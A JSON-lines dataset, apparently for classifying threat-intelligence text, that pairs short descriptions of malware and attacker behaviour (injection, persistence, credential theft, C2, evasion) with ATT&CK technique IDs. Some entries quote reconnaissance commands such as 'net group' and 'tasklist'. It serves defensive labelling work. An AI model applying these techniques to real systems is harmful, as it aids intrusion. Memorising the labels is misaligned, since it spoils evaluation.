{"text1":"hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.","labels":"['T1102']"}
{"text1":"hides collected data in password-protected .rar archives.","labels":"['T1560', 'T1486']"}
{"text1":"hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware.","labels":"['T1014']"}
{"text1":"hides many of its backdoor payloads in an alternate data stream (ADS).","labels":"['T1564.004']"}
{"text1":"hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.","labels":"['T1055.012']"}
{"text1":"identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems.","labels":"['T1135']"}
{"text1":"identifies and kills anti-malware processes.","labels":"['T1562.001']"}
{"text1":"identifies a proxy server if it exists and uses it to make HTTP requests.","labels":"['T1090']"}
{"text1":"identifies files and directories for collection by searching for specific file extensions or file modification time.","labels":"['T1083']"}
{"text1":"identifies files matching certain file extension and copies them to subdirectories it created.","labels":"['T1083']"}
{"text1":"identifies files with certain extensions and copies them to a directory in the user's profile.","labels":"['T1074']"}
{"text1":"identifies processes and collects the process ids.","labels":"['T1057']"}
{"text1":"identifies security software such as antivirus through the Security module.","labels":"['T1518.001']"}
{"text1":"identifies the victim username.","labels":"['T1033']"}
{"text1":"If an initial connectivity check fails,  attempts to extract proxy details and credentials from Windows Protected Storage and from the IE Credentials Store. This allows the adversary to use the proxy credentials for subsequent requests if they enable outbound HTTP access.","labels":"['T1552.001']"}
{"text1":"If  cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.","labels":"['T1078']"}
{"text1":"If  does not detect a proxy configured on the infected machine, it will send beacons via UDP\/6000. Also, after retrieving a C2 IP address and Port Number,  will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs.","labels":"['T1095']"}
{"text1":"If installing itself as a service fails,  instead writes itself as a file named svchost.exe saved in %APPDATA%\\Microsoft\\Network.","labels":"['T1036']"}
{"text1":"If running as administrator,  installs itself as a new service named bmwappushservice to establish persistence.","labels":"['T1543.003']"}
{"text1":"implements a command and control protocol over HTTP.","labels":"['T1071']"}
{"text1":"includes a capability to modify the \"beacon\" payload to eliminate known signatures or unpacking methods.","labels":"['T1027.005']"}
{"text1":"includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host.","labels":"['T1113']"}
{"text1":"includes garbage code to mislead anti-malware software and researchers.","labels":"['T1027.001']"}
{"text1":"infected victims using JavaScript code.","labels":"['T1064']"}
{"text1":"injects a DLL for  into the explorer.exe process.","labels":"['T1055']"}
{"text1":"injects DLL files into iexplore.exe.","labels":"['T1055']"}
{"text1":"injects into other processes to load modules.","labels":"['T1055']"}
{"text1":"injects into the Internet Explorer process.","labels":"['T1055']"}
{"text1":"injects into the svchost.exe process.","labels":"['T1055']"}
{"text1":"injects its DLL component into svchost.exe.","labels":"['T1055']"}
{"text1":"injects its DLL file into a newly spawned Internet Explorer process.","labels":"['T1055']"}
{"text1":"injects itself into various processes depending on whether it is low integrity or high integrity.","labels":"['T1055']"}
{"text1":"injects its malware variant, , into the cmd.exe process.","labels":"['T1055']"}
{"text1":"inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.","labels":"['T1001']"}
{"text1":"installation file is an unsigned DMG image under the guise of Intego\u2019s security solution for mac.","labels":"['T1036']"}
{"text1":"installed its payload in the startup programs folder as \"Baidu Software Update.\" The group also adds its second stage payload to the startup programs as \u201cNet Monitor.\"","labels":"['T1036']"}
{"text1":"installer searches the Registry and system to see if specific antivirus tools are installed on the system.","labels":"['T1518.001']"}
{"text1":"installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry.","labels":"['T1543.003']"}
{"text1":"installs a registry Run key to establish persistence.","labels":"['T1547.001']"}
{"text1":"installs a root certificate to aid in man-in-the-middle actions.","labels":"['T1553.004']"}
{"text1":"installs a service pointing to a malicious DLL dropped to disk.","labels":"['T1543.003']"}
{"text1":"installs itself as a new service.","labels":"['T1543.003']"}
{"text1":"installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance.","labels":"['T1543.003']"}
{"text1":"installs itself under Registry Run key to establish persistence.","labels":"['T1547.001']"}
{"text1":"Invoke-Kerberoast module can request service tickets and return crackable ticket hashes.","labels":"['T1558.003']"}
{"text1":"Invoke-TokenManipulation Exfiltration module can be used to locate and impersonate user logon tokens.","labels":"['T1134']"}
{"text1":"Invoke-WmiCommand CodeExecution module uses WMI to execute and retrieve the output from a  payload.","labels":"['T1047']"}
{"text1":"is a kernel-mode rootkit.","labels":"['T1014']"}
{"text1":"is a PowerShell backdoor.","labels":"['T1059.001']"}
{"text1":"is a RAT that communicates with HTTP.","labels":"['T1043']"}
{"text1":"is a rootkit that hides certain operating system artifacts.","labels":"['T1014']"}
{"text1":"is a rootkit used by .","labels":"['T1014']"}
{"text1":"is a simple proxy that creates an outbound RDP connection.","labels":"['T1090']"}
{"text1":"is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.","labels":"['T1014', 'T1542.001']"}
{"text1":"is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.","labels":"['T1542.003']"}
{"text1":"is a Web shell. The ASPXTool version used by  has been deployed to accessible servers running Internet Information Services (IIS).","labels":"['T1505.003']"}
{"text1":"is capable of accessing locally stored passwords on victims.","labels":"['T1552.001']"}
{"text1":"is capable of configuring itself as a service.","labels":"['T1543.003']"}
{"text1":"is capable of creating a remote Bash shell and executing commands.","labels":"['T1059']"}
{"text1":"is capable of creating a reverse shell.","labels":"['T1059']"}
{"text1":"is capable of creating reverse shell.","labels":"['T1059']"}
{"text1":"is capable of deleting files. It has been observed loading a Linux Kernel Module (LKM) and then deleting it from the hard disk as well as overwriting the data with null bytes.","labels":"['T1070.004']"}
{"text1":"is capable of deleting files on the victim. It also securely removes itself after collecting and exfiltrating data.","labels":"['T1070.004']"}
{"text1":"is capable of deleting Registry keys, sub-keys, and values on a victim system.","labels":"['T1112']"}
{"text1":"is capable of deleting Registry keys used for persistence.","labels":"['T1070']"}
{"text1":"is capable of downloading additional files.","labels":"['T1105']"}
{"text1":"is capable of downloading additional files through C2 channels, including a new version of itself.","labels":"['T1105']"}
{"text1":"is capable of downloading files, including additional modules.","labels":"['T1105']"}
{"text1":"is capable of downloading files from the C2.","labels":"['T1105']"}
{"text1":"is capable of downloading remote files.","labels":"['T1105']"}
{"text1":"is capable of enumerating and making modifications to an infected system's Registry.","labels":"['T1012']"}
{"text1":"is capable of enumerating and manipulating files and directories.","labels":"['T1083']"}
{"text1":"is capable of enumerating application windows.","labels":"['T1010']"}
{"text1":"is capable of executing commands.","labels":"['T1059']"}
{"text1":"is capable of executing commands and spawning a reverse shell.","labels":"['T1059']"}
{"text1":"is capable of executing commands via cmd.exe.","labels":"['T1059']"}
{"text1":"is capable of file deletion along with other file system interaction.","labels":"['T1070.004']"}
{"text1":"is capable of injecting code into the APC queue of a created  process as part of an \"Early Bird injection.\"","labels":"['T1055']"}
{"text1":"is capable of keylogging.","labels":"['T1056']"}
{"text1":"is capable of listing contents of folders on the victim.  also searches for custom network encryption software on victims.","labels":"['T1083']"}
{"text1":"is capable of listing files, folders, and drives on a victim.","labels":"['T1083']"}
{"text1":"is capable of loading executable code via process hollowing.","labels":"['T1055.012']"}
{"text1":"is capable of logging keystrokes.","labels":"['T1056']"}
{"text1":"is capable of obtaining directory, file, and drive listings.","labels":"['T1083']"}
{"text1":"is capable of opening a command terminal.","labels":"['T1059']"}
{"text1":"is capable of performing directory listings.","labels":"['T1083']"}
{"text1":"is capable of performing keylogging.","labels":"['T1056']"}
{"text1":"is capable of performing process listings.","labels":"['T1057']"}
{"text1":"is capable of performing remote command execution.","labels":"['T1059']"}
{"text1":"is capable of performing remote file transmission.","labels":"['T1105']"}
{"text1":"is capable of performing screen captures.","labels":"['T1113']"}
{"text1":"is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory.","labels":"['T1547.001']"}
{"text1":"is capable of probing the network for open ports.","labels":"['T1046']"}
{"text1":"is capable of providing shell functionality to the attacker to execute commands.","labels":"['T1059']"}
{"text1":"is capable of reading files over the C2 channel.","labels":"['T1041']"}
{"text1":"is capable of recording keystrokes.","labels":"['T1056']"}
{"text1":"is capable of retrieving information about the infected system.","labels":"['T1082']"}
{"text1":"is capable of spawning a Windows command shell.","labels":"['T1059']"}
{"text1":"is capable of spreading to USB devices.","labels":"['T1091']"}
{"text1":"is capable of starting a process using CreateProcess.","labels":"['T1106']"}
{"text1":"is capable of stealing Outlook passwords.","labels":"['T1003']"}
{"text1":"is capable of taking an image of and uploading the current desktop.","labels":"['T1113']"}
{"text1":"is capable of taking screenshots.","labels":"['T1113']"}
{"text1":"is capable of uploading and downloading files.","labels":"['T1105']"}
{"text1":"is capable of using HTTP, HTTPS, SMTP, and DNS for C2.","labels":"['T1071']"}
{"text1":"is capable of using ICMP, TCP, and UDP for C2.","labels":"['T1095']"}
{"text1":"is capable of using its command and control protocol over port 443. However, Duqu is also capable of encapsulating its command protocol over standard application layer protocols. The Duqu command and control protocol implements many of the same features as TCP and is a reliable transport protocol.","labels":"['T1095']"}
{"text1":"is capable of using Windows hook interfaces for information gathering such as credential access.","labels":"['T1056.004']"}
{"text1":"is capable of writing a file to the compromised system from the C2 server.","labels":"['T1105']"}
{"text1":"is capable of writing to a Registry Run key to establish.","labels":"['T1547.001']"}
{"text1":"is controlled via commands that are appended to image files.","labels":"['T1001']"}
{"text1":"is digitally signed by Microsoft.","labels":"['T1553.002']"}
{"text1":"is executed using rundll32.exe.","labels":"['T1218.011']"}
{"text1":"is heavily obfuscated in many ways, including through the use of spaghetti code in its functions in an effort to confuse disassembly programs. It also uses a custom XOR algorithm to obfuscate code.","labels":"['T1027']"}
{"text1":"is initially packed.","labels":"['T1027.002']"}
{"text1":"is installed via execution of rundll32 with an export named \"init\" or \"InitW.\"","labels":"['T1218.011']"}
{"text1":"is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens.","labels":"['T1111']"}
{"text1":"is known to have the capability to overwrite the firmware on hard drives from some manufacturers.","labels":"['T1542.002']"}
{"text1":"is known to use RAR with passwords to encrypt data prior to exfiltration.","labels":"['T1486']"}
{"text1":"is known to use software packing in its tools.","labels":"['T1027.002']"}
{"text1":"is known to utilize encryption within network protocols.","labels":"['T1573']"}
{"text1":"is launched through use of DLL search order hijacking to load a malicious dll.","labels":"['T1574.001']"}
{"text1":"is obfuscated using the obfuscation tool called ConfuserEx.","labels":"['T1027']"}
{"text1":"is obfuscated using the open source ConfuserEx protector.  also obfuscates the name of created files\/folders\/mutexes and encrypts debug messages written to log files using the Rijndael cipher.","labels":"['T1027']"}
{"text1":"is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.","labels":"['T1027']"}
{"text1":"is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.","labels":"['T1553.002']"}
{"text1":"is used to automate SQL injection.","labels":"['T1190']"}
{"text1":"is used to enumerate and dump information from Microsoft SharePoint.","labels":"['T1213']"}
{"text1":"is used to execute programs and other actions at the command-line interface.","labels":"['T1059']"}
{"text1":"is used to patch an enterprise domain controller authentication process with a backdoor password. It allows adversaries to bypass the standard authentication system to use a defined password for all accounts authenticating to that domain controller.","labels":"['T1098']"}
{"text1":"is used to poison name services to gather hashes and credentials from systems within a local network.","labels":"['T1557.001']"}
{"text1":"is used to schedule tasks on a Windows system to run at a specific date and time.","labels":"['T1053.005']"}
{"text1":"is usually configured with primary and backup domains for C2 communications.","labels":"['T1008']"}
{"text1":"is written in PowerShell.","labels":"['T1059.001']"}
{"text1":"keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call CreateProcessAsUserA under that user's context.","labels":"['T1134']"}
{"text1":"kills and disables services by using cmd.exe.","labels":"['T1059']"}
{"text1":"kills and disables services for Windows Firewall, Windows Security Center, and Windows Defender.","labels":"['T1562.001']"}
{"text1":"kills anti-virus found on the victim.","labels":"['T1562.001']"}
{"text1":"kills security tools like Wireshark that are running.","labels":"['T1562.001']"}
{"text1":"Lateral movement can be done with  through net use commands to connect to the on remote systems.","labels":"['T1021.002']"}
{"text1":"launched a scheduled task to gain persistence using the schtasks \/create \/sc command.","labels":"['T1053.005']"}
{"text1":"launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.","labels":"['T1218.011']"}
{"text1":"launches a scheduled task.","labels":"['T1053.005']"}
{"text1":"launches a script to delete their original decoy file to cover tracks.","labels":"['T1070.004']"}
{"text1":"launches a shell to execute commands on the victim\u2019s machine.","labels":"['T1059']"}
{"text1":"leveraged a compiled HTML file that contained a command to download and run an executable.","labels":"['T1218.001']"}
{"text1":"leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning.","labels":"['T1046']"}
{"text1":"leveraged a watering hole to serve up malicious code.","labels":"['T1189']"}
{"text1":"leveraged PowerShell to download and execute additional scripts for execution.","labels":"['T1059.001']"}
{"text1":"leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.","labels":"['T1059.001']"}
{"text1":"leveraged several compromised universities as proxies to obscure its origin.","labels":"['T1090']"}
{"text1":"leveraged the DDE protocol to deliver their malware.","labels":"['T1559.002']"}
{"text1":"leveraged the tool LaZagne for retrieving login and password information.","labels":"['T1003']"}
{"text1":"leverages a custom packer to obfuscate its functionality.","labels":"['T1027.002']"}
{"text1":"leverages cmd.exe to perform discovery techniques.","labels":"['T1059']"}
{"text1":"leverages legitimate social networking sites and cloud platforms (Twitter, Yandex, and Mediafire) for command and control communications.","labels":"['T1102']"}
{"text1":"leverages social networking sites and cloud platforms (AOL, Twitter, Yandex, Mediafire, pCloud, Dropbox, and Box) for C2.","labels":"['T1102']"}
{"text1":"leverages valid accounts after gaining credentials for use within the victim domain.","labels":"['T1078']"}
{"text1":"leverages vulnerable versions of Flash to perform execution.","labels":"['T1203']"}
{"text1":"likely obtained a list of hosts in the victim environment.","labels":"['T1018']"}
{"text1":"listed remote shared drives that were accessible from a victim.","labels":"['T1135']"}
{"text1":"lists files in directories.","labels":"['T1083']"}
{"text1":"lists processes running on the system.","labels":"['T1057']"}
{"text1":"lists running processes.","labels":"['T1057']"}
{"text1":"lists the directories for Desktop, program files, and the user\u2019s recently accessed files.","labels":"['T1083']"}
{"text1":"lists the running processes.","labels":"['T1057']"}
{"text1":"loads malicious shellcode and executes it in memory.","labels":"['T1064']"}
{"text1":"logs key strokes for configured processes and sends them back to the C2 server.","labels":"['T1056']"}
{"text1":"logs the keystrokes on the targeted system.","labels":"['T1056']"}
{"text1":"looks for specific files and file types.","labels":"['T1083']"}
{"text1":"lower disable security settings by changing Registry keys.","labels":"['T1562.001']"}
{"text1":"lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.","labels":"['T1204']"}
{"text1":"maintains access to victim environments by using  to access  as well as establishing a backup RDP tunnel by using .","labels":"['T1108']"}
{"text1":"makes modifications to open-source scripts from GitHub and executes them on the victim\u2019s machine.","labels":"['T1064']"}
{"text1":"makes their malware look like Flash Player, Office, or PDF documents in order to entice a user to click on it.","labels":"['T1204']"}
{"text1":"malicious spearphishing payloads are executed as .  has also used  during and.","labels":"['T1059.001']"}
{"text1":"malicious spearphishing payloads use WMI to launch malware and spawn cmd.exe execution.  has also used WMIC during and post compromise cleanup activities.","labels":"['T1047']"}
{"text1":"malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.","labels":"['T1110']"}
{"text1":"malware attempts to determine the installed version of .NET by querying the Registry.","labels":"['T1012']"}
{"text1":"malware can create a .lnk file and add a Registry Run key to establish persistence.","labels":"['T1547.009', 'T1547.001']"}
{"text1":"malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under HKCU\\Software\\Microsoft\\Office\\.","labels":"['T1112']"}
{"text1":"malware can decode contents from a payload that was Base64 encoded and write the contents to a file.","labels":"['T1140']"}
{"text1":"malware can download additional files from C2 servers.","labels":"['T1105']"}
{"text1":"malware can list a victim's logical drives and the type, as well the total\/free space of the fixed devices. Other malware can list a directory's contents.","labels":"['T1083']"}
{"text1":"malware can list running processes.","labels":"['T1057']"}
{"text1":"malware can use a SOAP Web service to communicate with its C2 server.","labels":"['T1102']"}
{"text1":"malware can use process hollowing to inject one of its trojans into another process.","labels":"['T1055.012']"}
{"text1":"malware communicates with its C2 server via HTTPS.","labels":"['T1071']"}
{"text1":"malware creates a scheduled task entitled \u201cIE Web Cache\u201d to execute a malicious file hourly.","labels":"['T1053.005']"}
{"text1":"malware deletes files in various ways, including \"suicide scripts\" to delete malware binaries from the victim.  also uses secure file deletion to delete files from the victim. Additionally,  malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine.","labels":"['T1070.004']"}
{"text1":"malware encrypts C2 traffic using RC4 with a hard-coded key.","labels":"['T1573']"}
{"text1":"malware gathers data from the local victim system.","labels":"['T1005']"}
{"text1":"malware gathers passwords from multiple sources, including Windows Credential Vault, Internet Explorer, Firefox, Chrome, and Outlook.","labels":"['T1003']"}
{"text1":"malware gathers system information via Windows Management Instrumentation (WMI).","labels":"['T1047']"}
{"text1":"malware gathers the Address Resolution Protocol (ARP) table from the victim.","labels":"['T1016']"}
{"text1":"malware gathers the registered user and primary owner name via WMI.","labels":"['T1033']"}
{"text1":"malware gathers the victim's local IP address, MAC address, and external IP address.","labels":"['T1016']"}
{"text1":"malware has communicated with C2 servers over port 6667 (for IRC) and port 8080.","labels":"['T1043']"}
{"text1":"malware has communicated with its C2 server over ports 4443 and 3543.","labels":"['T1571']"}
{"text1":"malware has created scheduled tasks to establish persistence.","labels":"['T1053.005']"}
{"text1":"malware has obtained the victim username and sent it to the C2 server.","labels":"['T1033']"}
{"text1":"malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer\/host name to send to the C2 server.","labels":"['T1082']"}
{"text1":"malware has used base64-encoded commands and files, and has also encrypted embedded strings with AES.","labels":"['T1027']"}
{"text1":"malware has used HTTP and IRC for C2.","labels":"['T1071']"}
{"text1":"malware has used HTTP for C2.","labels":"['T1071']"}
{"text1":"malware has used Registry Run keys to establish persistence.","labels":"['T1547.001']"}
{"text1":"malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop. Another  malware sample checks for the presence of the following Registry key:HKEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt.","labels":"['T1012']"}
{"text1":"malware IndiaIndia obtains and sends to its C2 server information about the first network interface card\u2019s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.","labels":"['T1016']"}
{"text1":"malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground.","labels":"['T1010']"}
{"text1":"malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server.  malware RomeoDelta archives specified directories in .zip format, encrypts the .zip file, and uploads it to its C2 server.","labels":"['T1560']"}
{"text1":"malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server.  malware RomeoDelta archives specified directories in .zip format, encrypts the .zip file, and uploads it to its C2 server. A  malware sample encrypts data using a simple byte based XOR operation prior to exfiltration.","labels":"['T1486']"}
{"text1":"malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.","labels":"['T1074']"}
{"text1":"malware IndiaIndia saves information gathered about the victim to a file that is uploaded to one of its 10 C2 servers. Another  malware sample also performs exfiltration over the C2 channel.","labels":"['T1041']"}
{"text1":"malware installs itself as a service to provide persistence and SYSTEM privileges.","labels":"['T1543.003']"}
{"text1":"malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP.","labels":"['T1008']"}
{"text1":"malware names itself \"svchost.exe,\" which is the name of the Windows shared service host program.","labels":"['T1036']"}
{"text1":"malware RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2. Additionally,  malware RoyalDNS has used DNS for C2.","labels":"['T1071']"}
{"text1":"malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement.","labels":"['T1021.002']"}
{"text1":"malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.","labels":"['T1048']"}
{"text1":"malware SierraCharlie uses RDP for propagation.","labels":"['T1021.001']"}
{"text1":"Malware used by  attempts to terminate processes corresponding to two components of Sophos Anti-Virus (SAVAdminService.exe and SavService.exe).","labels":"['T1562.001']"}
{"text1":"Malware used by  can run commands on the command-line interface.","labels":"['T1059']"}
{"text1":"Malware used by  is capable of capturing keystrokes.","labels":"['T1056']"}
{"text1":"Malware used by  is capable of remotely deleting files from victims.","labels":"['T1070.004']"}
{"text1":"malware uses Caracachs encryption to encrypt C2 payloads.","labels":"['T1573']"}
{"text1":"malware uses cmd.exe to execute commands on victims.","labels":"['T1059']"}
{"text1":"malware uses multiple types of encryption and encoding in its malware files, including AES, Caracachs, RC4, basic XOR with constant 0xA7, and other techniques.","labels":"['T1027']"}
{"text1":"malware uses PowerShell and WMI to script data collection and command execution on the victim.","labels":"['T1064']"}
{"text1":"malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.","labels":"['T1059.001']"}
{"text1":"malware WhiskeyDelta-Two contains a function that attempts to rename the administrator\u2019s account.","labels":"['T1098']"}
{"text1":"malware xxmm contains a UAC bypass tool for privilege escalation.","labels":"['T1548.002']"}
{"text1":"manipulated .lnk files to gather user credentials in conjunction with .","labels":"['T1547.009']"}
{"text1":"Many  samples can perform UAC bypass by using eventvwr.exe to execute a malicious file.","labels":"['T1548.002']"}
{"text1":"Many  samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file.","labels":"['T1070.006']"}
{"text1":"Many strings in  are obfuscated with a XOR algorithm.","labels":"['T1027']"}
{"text1":"may attempt to connect to systems within a victim's network using net use commands and a predefined list or collection of passwords.","labels":"['T1110']"}
{"text1":"may be used to exfiltrate data separate from the main command and control protocol.","labels":"['T1048']"}
{"text1":"may be used to find credentials in the Windows Registry.","labels":"['T1552.002']"}
{"text1":"may be used to gather details from the Windows Registry of a local or remote system at the command-line interface.","labels":"['T1012']"}
{"text1":"may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface.","labels":"['T1112']"}
{"text1":"may collect active network connections by running netstat -an on a victim.","labels":"['T1049']"}
{"text1":"may collect information about running processes.","labels":"['T1057']"}
{"text1":"may collect information about the system by running hostname and systeminfo on a victim.","labels":"['T1082']"}
{"text1":"may collect information the victim's anti-virus software.","labels":"['T1518.001']"}
{"text1":"may collect network configuration data by running ipconfig \/all on a victim.","labels":"['T1016']"}
{"text1":"may collect permission group information by running net group \/domain or a series of other commands on a victim.","labels":"['T1069']"}
{"text1":"may create a file containing the results of the command cmd.exe \/c ipconfig \/all.","labels":"['T1016']"}
{"text1":"may create a file containing the results of the command cmd.exe \/c net user {Username}.","labels":"['T1087']"}
{"text1":"may create a temporary user on the system named \u201cLost_{Unique Identifier}.\u201d","labels":"['T1136']"}
{"text1":"may create a temporary user on the system named \u201cLost_{Unique Identifier}\u201d with the password \u201cpond~!@6\u201d{Unique Identifier}.\u201d","labels":"['T1136']"}
{"text1":"may enumerate user directories on a victim.","labels":"['T1083']"}
{"text1":"may gather a list of running processes by running tasklist \/v.","labels":"['T1057']"}
{"text1":"may have used the  malware to move onto air-gapped networks.  targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.","labels":"['T1091']"}
{"text1":"may save itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service.","labels":"['T1036']"}
{"text1":"may store RC4 encrypted configuration information in the Windows Registry.","labels":"['T1112']"}
{"text1":"may use net group \"domain admins\" \/domain to display accounts in the \"domain admins\" permissions group and net localgroup \"administrators\" to list local system administrator group membership.","labels":"['T1087']"}
{"text1":"may use net view \/domain to display hostnames of available systems on a network.","labels":"['T1018']"}
{"text1":"may use  to add local firewall rule exceptions.","labels":"['T1562.001']"}
{"text1":"may use WMI when collecting information about a victim.","labels":"['T1047']"}
{"text1":"Microsoft Sysinternals  is a popular administration tool that can be used to execute binaries on remote systems using a temporary Windows service.","labels":"['T1569.002']"}
{"text1":"mimics a legitimate Russian program called USB Disk Security.","labels":"['T1036']"}
{"text1":"mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules.","labels":"['T1036']"}
{"text1":"modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications.","labels":"['T1112']"}
{"text1":"modifies the %regrun% Registry to point itself to an autostart mechanism.","labels":"['T1547.001']"}
{"text1":"modifies the time of a file as specified by the control server.","labels":"['T1070.006']"}
{"text1":"modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013.","labels":"['T1070.006']"}
{"text1":"modules are written in and executed via .","labels":"['T1059.001']"}
{"text1":"Modules can be pushed to and executed by  that copy data to a staging area, compress it, and XOR encrypt it.","labels":"['T1560', 'T1486', 'T1074']"}
{"text1":"monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.","labels":"['T1119']"}
{"text1":"monitors USB devices and copies files with certain extensions to\na predefined directory.","labels":"['T1119']"}
{"text1":"Most of the strings in  are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed. API function names are also reversed, presumably to avoid detection in memory.","labels":"['T1027']"}
{"text1":"Most  samples maintain persistence by setting the Registry Run key SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ in the HKLM or HKCU hive, with the Registry value and file name varying by sample.","labels":"['T1547.001']"}
{"text1":"Most strings in  are encrypted using 3DES and XOR and reversed.","labels":"['T1027']"}
{"text1":"moved laterally via RDP.","labels":"['T1021.001']"}
{"text1":"MSGET downloader uses a dead drop resolver to access malicious payloads.","labels":"['T1102']"}
{"text1":"named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory CSIDL_APPDATA\\microsoft\\security.","labels":"['T1036']"}
{"text1":"network loader encrypts C2 traffic with RSA and RC6.","labels":"['T1573']"}
{"text1":"network traffic can communicate over a raw socket.","labels":"['T1095']"}
{"text1":"network traffic communicates over common ports like 80, 443, or 1433.","labels":"['T1043']"}
{"text1":"Newer variants of  will encode C2 communications with a custom system.","labels":"['T1001']"}
{"text1":"New services created by  are made to appear like legitimate Windows services, with names such as \"Windows Management Help Service\", \"Microsoft Support\", and \"Windows Advanced Task Manager\".","labels":"['T1036']"}
{"text1":"obfuscated scripts that were used on victim machines.","labels":"['T1027']"}
{"text1":"obfuscated several scriptlets and code used on the victim\u2019s machine, including through use of XOR.","labels":"['T1027']"}
{"text1":"obfuscates C2 communication using a 1-byte XOR with the key 0xBE.","labels":"['T1573']"}
{"text1":"obfuscates C2 traffic with variable 4-byte XOR keys.","labels":"['T1573']"}
{"text1":"obfuscates files by splitting strings into smaller sub-strings and including \"garbage\" strings that are never used. The malware also uses return-oriented programming (ROP) technique and single-byte XOR to obfuscate data.","labels":"['T1027']"}
{"text1":"obfuscates files or information to help evade defensive measures.","labels":"['T1027']"}
{"text1":"obfuscates internal strings and unpacks them at startup.","labels":"['T1027']"}
{"text1":"obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.","labels":"['T1027']"}
{"text1":"obfuscates strings using a custom stream cipher.","labels":"['T1027']"}
{"text1":"obtained OS version and hardware configuration from a victim.","labels":"['T1082']"}
{"text1":"obtains additional code to execute on the victim's machine.","labels":"['T1105']"}
{"text1":"obtains a list of running processes.","labels":"['T1057']"}
{"text1":"obtains a list of running processes on the victim.","labels":"['T1057']"}
{"text1":"obtains a list of running processes through WMI querying and the ps command.","labels":"['T1057']"}
{"text1":"obtains and saves information about victim network interfaces and addresses.","labels":"['T1049']"}
{"text1":"obtains application windows titles and then determines which windows to perform  on.","labels":"['T1010']"}
{"text1":"obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications.","labels":"['T1083']"}
{"text1":"obtains the current user's security identifier.","labels":"['T1033']"}
{"text1":"obtains the IP address from the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"obtains the number of removable drives from the victim.","labels":"['T1120']"}
{"text1":"obtains the system time and will only activate if it is greater than a preset date.","labels":"['T1124']"}
{"text1":"obtains the victim's current time.","labels":"['T1124']"}
{"text1":"obtains the victim's operating system version and keyboard layout and sends the information to the C2 server.","labels":"['T1082']"}
{"text1":"obtains the victim computer name and encrypts the information to send over its C2 channel.","labels":"['T1082']"}
{"text1":"obtains the victim IP address.","labels":"['T1016']"}
{"text1":"obtains the victim username.","labels":"['T1033']"}
{"text1":"obtains the victim username and encrypts the information to send over its C2 channel.","labels":"['T1033']"}
{"text1":"obtains Windows logon password details.","labels":"['T1003']"}
{"text1":"Once a removable media device is inserted back into the first victim,  collects data from it that was exfiltrated from a second victim.","labels":"['T1025']"}
{"text1":"Once  has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy to 1.","labels":"['T1112']"}
{"text1":"One persistence mechanism used by  is to register itself as a scheduled task.","labels":"['T1053.005']"}
